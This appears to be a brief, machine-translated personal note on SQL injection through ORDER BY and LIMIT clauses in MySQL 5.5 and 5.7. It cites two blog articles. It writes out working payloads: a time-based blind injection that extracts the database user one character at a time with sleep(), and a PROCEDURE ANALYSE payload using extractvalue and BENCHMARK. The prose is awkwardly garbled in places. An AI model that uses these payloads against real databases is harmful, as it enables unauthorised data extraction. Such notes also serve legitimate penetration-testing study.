order by back injection, usually first try to inject an error, error-free when we can note by rand (ture) and bool type blind rand (false) to carry out, but today met no echo data (that is not in the database data) cases, this is too much trouble. Record what sql statement
Reference article: https: //www.cnblogs.com/babers/p/7397525.html
https://www.cnblogs.com/Vinson404/p/7246792.html?utm_source=itdadao&utm_medium=referral
Simply put: There seems to only be able to inject 5.5 and 5.7, not 5.6 (personal point of view, not necessarily)
As the only local mysql5.6 5.7 and 5.7, when used to reproduce the vulnerability here
5.7 Statement order by (select 1 from (select 1 and if (ascii (substr ((user ()), 1,1)) = 114, sleep (5), 1)) x) # (Remarks about, mysql insert provisions It sets the table name must be an alias)
This situation can be converted to 5.7 after injection limit
ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)